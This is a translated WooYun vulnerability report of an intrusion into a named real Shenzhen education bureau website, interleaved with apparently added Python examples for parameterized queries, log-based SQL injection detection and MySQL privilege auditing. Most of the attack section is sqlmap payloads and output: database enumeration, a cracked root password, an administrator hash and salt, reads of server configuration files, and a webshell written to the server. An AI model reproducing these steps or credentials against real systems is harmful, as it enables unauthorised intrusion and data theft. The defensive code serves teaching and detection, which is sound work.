
Vulnerability summary (followers: 24)

Vulnerability ID: wooyun-2015-0125977

Title: Penetration test of the Shenzhen Longgang education network

Vendor: Shenzhen Longgang District Education Bureau (深圳市龙岗教育局)

Author: 安全小飞侠

Submitted: 2015-07-11 08:57

Fix time: 2015-08-25 08:58

Published: 2015-08-25 08:58

Vulnerability type: successful intrusion

Severity: high

Self-assessed rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-08-25: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A successful intranet compromise that started from a single SQL injection...
Please call me 安全小飞侠, thanks!

Detailed description:

I recently wrote a small script that automatically collects URLs and scans them for SQL injection, and wanted to see whether it would turn up anything new.
And so the story below happened...
One day after work I got home and checked the server on which the script had been running for a few days, thinking it was time to reel in the catch. The result was not what I expected: not a single "big fish" was caught, but I did find this URL in the log:

http://www.szlg.edu.cn/hudong.php?id=3144


A quick manual test confirmed that there is indeed a SQL injection vulnerability.

http://www.szlg.edu.cn/hudong.php?id=3144' or 1=1
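What the stray quote in the test URL above does to the query, shown as an added example in Python that is not code from the report or from the site: the vulnerable string concatenation, the same lookup with a bound parameter, and a lookup that also validates the input, which is the fix the report's "you know what to do" leaves unstated. The table `hudong`, its columns and rows, and the function names are constructed for the demonstration and are not the site's real schema.

```python
import re
import sqlite3

# Constructed stand-in for the table behind hudong.php?id=...; the table
# name, columns and rows are assumptions, not the site's real schema.
SAMPLE_ROWS = [
    (3144, "interaction item A"),
    (3145, "interaction item B"),
    (3146, "interaction item C"),
]


def make_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE hudong (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO hudong VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_unsafe(conn, raw_id):
    """Vulnerable pattern: the request parameter is pasted into the SQL text.

    Whatever follows the number becomes part of the WHERE clause, which is
    why '3144 OR 1=1' returns every row.  The report's payload with a stray
    quote (3144' or 1=1) makes the statement unparseable instead, and that
    error is the signal the error-based technique in the sqlmap output
    builds on.
    """
    sql = "SELECT id, title FROM hudong WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Bound parameter: the input travels as a value, never as SQL text.

    The whole string is compared against the integer id column as one
    value, so an injected 'OR 1=1' simply matches no row.
    """
    sql = "SELECT id, title FROM hudong WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def parse_id(raw_id):
    """Input validation for a numeric id: accept plain ASCII digits only."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("id must be a decimal integer, got %r" % (raw_id,))
    return int(raw_id)


def lookup_safe(conn, raw_id):
    """Validation plus a bound parameter: reject junk early, bind the rest."""
    sql = "SELECT id, title FROM hudong WHERE id = ?"
    return conn.execute(sql, (parse_id(raw_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe, normal id :", lookup_unsafe(db, "3144"))
    print("unsafe, injected  :", lookup_unsafe(db, "3144 OR 1=1"))
    print("parameterized     :", lookup_parameterized(db, "3144 OR 1=1"))
    print("validated         :", lookup_safe(db, "3144"))
```

The parameterized lookup alone already neutralises the injection; the validation step on top of it turns a silent empty result into an explicit error that can be logged and rate-limited, which is what the detection side of the fix needs.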


sqli.jpg


So I ran sqlmap against it without further ado, and all sorts of tables appeared, 250+ at a quick glance. And the account even had DBA privileges.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=-7371 OR 6656=6656#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1 OR (SELECT 2370 FROM(SELECT COUNT(*),CONCAT(0x71767a7071,(SELECT (ELT(2370=2370,1))),0x717a7a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))GkhW)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x71767a7071,0x71736979464a5a754149,0x717a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[17:24:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:24:18] [INFO] fetching database names
[17:24:18] [INFO] the SQL query used returns 9 entries
[17:24:18] [INFO] resumed: "information_schema"
[17:24:18] [INFO] resumed: "cdcol"
[17:24:18] [INFO] resumed: "empirecms"
[17:24:18] [INFO] resumed: "lgedusupervision"
[17:24:18] [INFO] resumed: "lgjys"
[17:24:18] [INFO] resumed: "mysql"
[17:24:18] [INFO] resumed: "performance_schema"
[17:24:18] [INFO] resumed: "phpmyadmin"
[17:24:18] [INFO] resumed: "test"
available databases [9]:
[*] cdcol
[*] empirecms
[*] information_schema
[*] lgedusupervision
[*] lgjys
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[17:25:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:25:21] [INFO] fetching current user
current user: 'root@localhost'
[17:25:21] [INFO] fetching current database
current database: 'empirecms'
[17:25:21] [INFO] testing if current user is DBA
[17:25:21] [INFO] fetching current user
current user is DBA: True
[18:04:19] [INFO] cracked password 'root' for user 'root'
database management system users password hashes:
[*] pma [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
[*] root [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
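The payload families in the sqlmap output above leave a recognisable trail in the web server's access log, which is where a defender would have seen this first. The following added example, which is not part of the report, scans constructed Apache combined-format log lines (client addresses from the 192.0.2.0/24 documentation range, timestamps and user agents made up) for those families: tautologies such as `OR 6656=6656`, `UNION ... SELECT`, `SLEEP(`, `CONCAT(0x...` and the file-access functions the report relies on later. The rule names and the `classify`/`scan_log` functions are my own, not sqlmap or Apache terms.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format: client, ident, user, [time], "request", status,
# size, "referer", "user-agent".  The request target is matched lazily so a
# raw space inside it does not break the parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Rules applied to the decoded request target, derived from the payload
# families in the sqlmap output.  Names are labels of this example only.
TARGET_RULES = [
    ("tautology", re.compile(r"\b(?:or|and)\s+(['\"]?)(\w+)\1\s*=\s*\1\2\1", re.I)),
    ("union_select", re.compile(r"\bunion\b.{0,20}\bselect\b", re.I)),
    ("time_based", re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)),
    ("error_based", re.compile(r"\b(?:concat|extractvalue|updatexml)\s*\(\s*0x[0-9a-f]+", re.I)),
    ("file_access", re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b", re.I)),
]

# Constructed sample log (not from the site): a normal request, the manual
# test, three sqlmap probes, then two benign requests that must not fire.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2015:17:24:18 +0800] "GET /hudong.php?id=3144 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    '192.0.2.10 - - [11/Jul/2015:17:24:19 +0800] "GET /hudong.php?id=3144%27%20or%201%3D1 HTTP/1.1" 500 318 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    '192.0.2.10 - - [11/Jul/2015:17:24:20 +0800] "GET /hudong.php?id=-7371%20OR%206656%3D6656%23 HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev"',
    '192.0.2.10 - - [11/Jul/2015:17:24:21 +0800] "GET /hudong.php?id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))GkhW) HTTP/1.1" 200 5123 "-" "sqlmap/1.0-dev"',
    '192.0.2.10 - - [11/Jul/2015:17:24:22 +0800] "GET /hudong.php?id=1%20UNION%20ALL%20SELECT%20CONCAT(0x71767a7071,0x71736979464a5a754149,0x717a7a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HTTP/1.1" 200 5301 "-" "sqlmap/1.0-dev"',
    '192.0.2.11 - - [11/Jul/2015:17:30:00 +0800] "GET /hudong.php?id=3145 HTTP/1.1" 200 5100 "-" "Mozilla/5.0 (Windows NT 6.1)"',
    '192.0.2.12 - - [11/Jul/2015:17:31:07 +0800] "GET /search.php?q=tutorial+for+android HTTP/1.1" 200 4410 "-" "Mozilla/5.0 (X11; Linux)"',
]


def decode_target(target, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(line):
    """Sorted rule names firing on one line; [] for a clean line, None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = set()
    target = decode_target(m.group("target"))
    for name, rule in TARGET_RULES:
        if rule.search(target):
            hits.add(name)
    # Tool fingerprint: sqlmap announces itself unless told otherwise.
    if "sqlmap" in m.group("ua").lower():
        hits.add("sqlmap_ua")
    return sorted(hits)


def scan_log(lines):
    """Map 1-based line numbers to the rules that fired; clean lines are omitted."""
    findings = {}
    for n, line in enumerate(lines, 1):
        hits = classify(line.rstrip("\n"))
        if hits:
            findings[n] = hits
    return findings


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        print("line %d: %s" % (n, ", ".join(hits)))
```

The decoding step matters more than the patterns: Apache logs the request as sent, so `%27` and `%3D` have to be unfolded before `' or 1=1` is visible, and the bounded loop also catches double-encoded probes without spinning on input that never settles. Tuning for a real site means feeding its own log through `scan_log` and reviewing what the tautology rule picks up in free-text search parameters.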


The display here is a bit odd (it looks as if it is listing databases), but these are actually all tables under the Empirecms database.

tables.jpg


Out of habit, I looked for any sensitive information that might be visible.

Database: empirecms
Table: phome_enewsuser
[22 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| addip | varchar(20) |
| addtime | int(10) unsigned |
| adminclass | mediumtext |
| checked | tinyint(1) |
| classid | smallint(5) unsigned |
| email | varchar(120) |
| filelevel | tinyint(1) |
| groupid | smallint(5) unsigned |
| lastip | varchar(20) |
| lasttime | int(10) unsigned |
| loginnum | int(10) unsigned |
| password | varchar(32) |
| preip | varchar(20) |
| pretime | int(10) unsigned |
| rnd | varchar(20) |
| salt | varchar(8) |
| styleid | smallint(5) unsigned |
| truename | varchar(20) |
| userid | int(10) unsigned |
| username | varchar(30) |
| userorg | mediumtext |
| userprikey | varchar(50) |
+------------+----------------------+
Database: empirecms
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| phome_enewsuser | 32 |
+-----------------+---------+


Let's see whether there is an administrator password or the like to log into the backend with.

[17:34:32] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:34:32] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from phome_enewsuser where userid=1
[17:35:11] [INFO] fetching SQL SELECT statement query output: 'select * from phome_enewsuser where userid=1'
[17:35:11] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[17:35:11] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[17:35:11] [INFO] fetching current database
[17:35:11] [INFO] fetching columns for table 'phome_enewsuser' in database 'empirecms'
[17:35:11] [INFO] the SQL query used returns 22 entries
[17:35:11] [INFO] the query with expanded column name(s) is: SELECT addip, addtime, adminclass, checked, classid, email, filelevel, groupid, lastip, lasttime, loginnum, password, preip, pretime, rnd, salt, styleid, truename, userid, username, userorg, userprikey FROM phome_enewsuser WHERE userid=1
[17:35:11] [INFO] the SQL query used returns 1 entries
[17:35:11] [INFO] retrieved: "127.0.0.1","1415617712","|","0","0","","0","1",...
select * from phome_enewsuser where userid=1 [1]:
[*] 127.0.0.1, 1415617712, |, 0, 0, , 0, 1, 125.218.66.122, 1436497771, 494, 50407f6a9a8138749ac075b0decbb1d6, 125.218.66.122, 1436497708, GmAwTFUqjim8eCg28t7g, 8vYLFas4, 1, , 1, lgadmin, , HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH


There was one, but seeing that it was stored as a salted hash I gave up on it right away... Then I thought: if I can't crack the password, can I add an administrator-level account with an INSERT instead?
Said and done, but at this point I noticed a detail: the database name Empirecms and the prefix phome_enews**** on every table. Doesn't that look familiar? What are we waiting for, let's Baidu it.

epcms.jpg


See that? That's it, "帝国网站管理系统" (EmpireCMS; what a domineering name!!!). Seeing this I couldn't help being a little pleased: knowing the source code and the database structure would make things much easier. I downloaded a copy and deployed it in a VM to see how the system authenticates administrators. After a bit of tinkering in the VM I finally found the following way to reset the administrator password.

admin.jpg


At this point I seemed to have found a way to confirm my initial idea: add an administrator account on the VM install, then export the salt, random number and hashed password generated by the system into this site's database, and I would effectively hold administrator privileges on this CMS. So I happily set about testing the idea and looked forward to good news.

web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[17:34:32] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select * from phome_enewsuser where userid=1
[17:35:11] [INFO] fetching SQL SELECT statement query output: 'select * from phome_enewsuser where userid=1'
[17:35:11] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[17:35:11] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[17:35:11] [INFO] fetching current database
[17:35:11] [INFO] fetching columns for table 'phome_enewsuser' in database 'empirecms'
[17:35:11] [INFO] the SQL query used returns 22 entries
[17:35:11] [INFO] the query with expanded column name(s) is: SELECT addip, addtime, adminclass, checked, classid, email, filelevel, groupid, lastip, lasttime, loginnum, password, preip, pretime, rnd, salt, styleid, truename, userid, username, userorg, userprikey FROM phome_enewsuser WHERE userid=1
[17:35:11] [INFO] the SQL query used returns 1 entries
[17:35:11] [INFO] retrieved: "127.0.0.1","1415617712","|","0","0","","0","1",...
select * from phome_enewsuser where userid=1 [1]:
[*] 127.0.0.1, 1415617712, |, 0, 0, , 0, 1, 125.218.66.122, 1436497771, 494, 50407f6a9a8138749ac075b0decbb1d6, 125.218.66.122, 1436497708, GmAwTFUqjim8eCg28t7g, 8vYLFas4, 1, , 1, lgadmin, , HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
sql-shell> insert into phome_enewsuser (addip, addtime, adminclass, checked, classid, email, filelevel, groupid, lastip, lasttime, loginnum, password, preip, pretime,rnd, salt, styleid, truename, userid, username, userorg, userprikey) values ('127.0.0.1', '1415617712', '|', 0, 0, , 0, 1, '125.218.66.122','1436497771', 494, '50407f6a9a8138749ac075b0decbb1d6', '125.218.66.122', '1436497708, 'GmAwTFUqjim8eCg28t7g','8vYLFas4', 1, '', 33, 'lgadmin', '', 'HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH')
[17:56:59] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
sql-shell>


However, it failed! After looking it up (experts, please don't flame me) I learned that INSERT and UPDATE statements are not supported here. Fine, that road is closed too; is this as far as it goes? Then I remembered that a very familiar database, phpmyadmin, had shown up earlier, and I also had the root password, so why not give it a try?

phpmyadmin.jpg


Result: failed again! The account and password obtained earlier could not log in. What now? Calm down and analyse again: phpMyAdmin + MySQL + Apache + PHP, a very familiar combination; could this be an application deployed with XAMPP?
Let's test that, starting by fetching /opt/lampp/etc/php.ini to take a look.

[18:11:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:11:45] [INFO] fingerprinting the back-end DBMS operating system
[18:11:45] [INFO] the back-end DBMS operating system is Linux
[18:11:45] [INFO] fetching file: '/opt/lampp/etc/php.ini'
do you want confirmation that the remote file '/opt/lampp/etc/php.ini' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:11:48] [INFO] the local file C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\files\_opt_lampp_etc_php.ini and the remote file /opt/lampp/etc/php.ini have the same size (69081b)
files saved to [1]:
[*] C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\files\_opt_lampp_etc_php.ini (same file)


php.jpg


So it really is deployed with XAMPP; that makes things easier. Now all I need is the site's absolute path and I can upload a webshell directly and take it.
I read /opt/lampp/etc/httpd.conf without trouble and found the site's absolute path: /home/lgedu

[18:17:08] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:17:08] [INFO] fingerprinting the back-end DBMS operating system
[18:17:08] [INFO] the back-end DBMS operating system is Linux
[18:17:08] [INFO] fetching file: '/opt/lampp/etc/httpd.conf'
do you want confirmation that the remote file '/opt/lampp/etc/httpd.conf' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[18:17:11] [INFO] the local file C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\files\_opt_lampp_etc_httpd.conf and the remote file /opt/lampp/etc/httpd.conf have the same size (23342b)
files saved to [1]:
[*] C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn\files\_opt_lampp_etc_httpd.conf (same file)


homepath.jpg


Finally, I uploaded a webshell, connected to it with 菜刀 (China Chopper), and the site was completely taken.

[18:21:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.15, Apache 2.4.10
back-end DBMS: MySQL 5.0
[18:21:33] [INFO] fingerprinting the back-end DBMS operating system
[18:21:33] [INFO] the back-end DBMS operating system is Linux
[18:21:34] [WARNING] reflective value(s) found and filtering out
[18:21:34] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file 'C:/Users/hacker/Desktop/wy.php' has been successfully written on the back-end DBMS file system (/home/lgedu/e/admin/view/key/wy.php)? [Y/n] Y
[18:21:39] [INFO] the remote file /home/lgedu/e/admin/view/key/wy.php is larger (35b) than the local file C:/Users/hacker/Desktop/wy.php (28b)
[18:21:39] [INFO] fetched data logged to text files under 'C:\Users\hacker\.sqlmap\output\www.szlg.edu.cn'
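Reading php.ini and httpd.conf and then writing wy.php through the injection depend on server-side settings rather than on the injection itself: the MySQL FILE privilege (included in ALL PRIVILEGES on *.*, which the root account here holds) and an empty secure_file_priv, which is what lets LOAD_FILE() and SELECT ... INTO OUTFILE reach the filesystem. The added example below, which is not code from the report, from EmpireCMS or from XAMPP, audits `SHOW GRANTS` output and a my.cnf fragment for exactly those conditions; the account names, the config snippets and the finding codes are constructed for the example.

```python
import re
from configparser import ConfigParser

# Constructed inputs modelled on the situation in the report: the web
# application connects as root@localhost with every global privilege, and
# secure_file_priv is left empty.  Names and snippets are assumptions.
GRANTS_AS_FOUND = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
]
MYCNF_AS_FOUND = """
[mysqld]
port=3306
secure_file_priv=
"""

# A least-privilege account for the same CMS: no global privileges at all,
# row-level rights on its own schema only, file access switched off.
GRANTS_HARDENED = [
    "GRANT USAGE ON *.* TO 'cms_app'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `empirecms`.* TO 'cms_app'@'localhost'",
]
MYCNF_HARDENED = """
[mysqld]
port=3306
secure_file_priv=NULL
local_infile=0
"""

GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+"
    r"'(?P<user>[^']*)'@'(?P<host>[^']*)'(?P<tail>.*)$",
    re.I,
)


def parse_grant(line):
    """Split one SHOW GRANTS line into privilege set, scope, user and options."""
    m = GRANT_RE.match(line.strip())
    if not m:
        raise ValueError("not a GRANT statement: %r" % (line,))
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    return {
        "privs": privs,
        "scope": m.group("scope"),
        "user": m.group("user"),
        "grant_option": "GRANT OPTION" in m.group("tail").upper(),
    }


def secure_file_priv(mycnf_text):
    """Configured secure_file_priv, or None when the option is absent or empty.

    MySQL accepts dashes or underscores in option names, and my.cnf may carry
    bare options and !include lines that ConfigParser rejects, so the text
    is normalised first.
    """
    cp = ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    cp.optionxform = lambda name: name.strip().lower().replace("-", "_")
    cleaned = "\n".join(l for l in mycnf_text.splitlines() if not l.lstrip().startswith("!"))
    cp.read_string(cleaned)
    value = cp.get("mysqld", "secure_file_priv", fallback=None)
    if value is None:
        return None
    value = value.strip().strip('"')
    return value or None


def audit(grant_lines, mycnf_text):
    """Sorted finding codes for the account the web application connects as."""
    findings = set()
    for line in grant_lines:
        g = parse_grant(line)
        if g["user"] == "root":
            findings.add("app_runs_as_root")
        if g["scope"] == "*.*" and ({"ALL PRIVILEGES", "ALL", "FILE"} & g["privs"]):
            # FILE is a global privilege; it is what LOAD_FILE() and
            # SELECT ... INTO OUTFILE need, i.e. the config reads and the
            # webshell write in the report.
            findings.add("file_privilege")
        if g["scope"] == "*.*" and ({"ALL PRIVILEGES", "ALL", "SUPER"} & g["privs"]):
            findings.add("super_privilege")
        if g["grant_option"]:
            findings.add("grant_option")
    sfp = secure_file_priv(mycnf_text)
    if sfp is None:
        # Empty or unset means no restriction on MySQL 5.6 and earlier (the
        # XAMPP generation in this report); newer servers compile in a
        # directory default, so confirm with SHOW VARIABLES LIKE 'secure_file_priv'.
        findings.add("secure_file_priv_unrestricted")
    elif sfp.upper() != "NULL":
        findings.add("secure_file_priv_directory_only")
    return sorted(findings)


if __name__ == "__main__":
    print("as found :", audit(GRANTS_AS_FOUND, MYCNF_AS_FOUND))
    print("hardened :", audit(GRANTS_HARDENED, MYCNF_HARDENED))
```

Run against a real server, the grant lines come from `SHOW GRANTS FOR 'user'@'host'` for the account named in the application's database configuration, and the my.cnf text from whichever file `mysqld --help --verbose` reports as read. Either finding alone would have stopped the file-read and webshell-write steps of this report even with the injection still present; fixing the injection itself is of course still required.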


webshell.jpg


The end...

Proof of vulnerability:



Fix recommendation:

You know what to do!

Copyright notice: when reposting, credit the source 安全小飞侠@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively refused